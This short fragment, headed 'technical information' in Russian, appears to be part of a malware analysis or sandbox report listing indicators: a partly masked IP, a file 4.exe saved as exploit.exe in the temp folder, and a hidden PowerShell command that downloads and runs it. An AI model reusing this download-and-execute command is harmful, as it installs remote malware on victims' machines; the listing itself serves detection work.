Техническая информация
- http://5.##7.7.161/4.exe как %temp%\exploit.exe
- '5.##7.7.161':80
- '<SYSTEM32>\cmd.exe' /c PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://5.##7.7.161/4.exe','%temp%\exploit.exe');Start-Process '%temp%\exploit.exe'